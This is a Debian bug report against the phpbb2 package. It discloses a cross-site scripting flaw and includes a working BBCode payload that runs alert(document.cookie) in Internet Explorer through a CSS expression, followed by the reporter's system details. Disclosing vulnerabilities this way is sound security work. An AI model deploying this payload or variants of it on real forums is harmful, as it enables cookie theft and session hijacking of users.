Package: phpbb2 Version: 2.0.13-6 Severity: serious XSS was reported it bugtraq 05 july.
Just tested it on my phpbb2 installation and found the following code shows cookies on MS IE. [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`alert(document.cookie);this.sss=null`style='font-size:0;][/url][/url]'[/color] -- System Information: Debian Release: 3.1 APT prefers testing APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.11-1-686 Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R) Versions of packages phpbb2 depends on: ii apache [httpd] 1.3.33-6 versatile, high-performance HTTP s ii debconf 1.4.30.13 Debian configuration management sy ii libapache-mod-php4 4:4.3.10-15 server-side, HTML-embedded scripti ii php4 4:4.3.10-15 server-side, HTML-embedded scripti ii php4-mysql 4:4.3.10-15 MySQL module for php4 -- debconf information: * phpbb2/httpd: apache -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]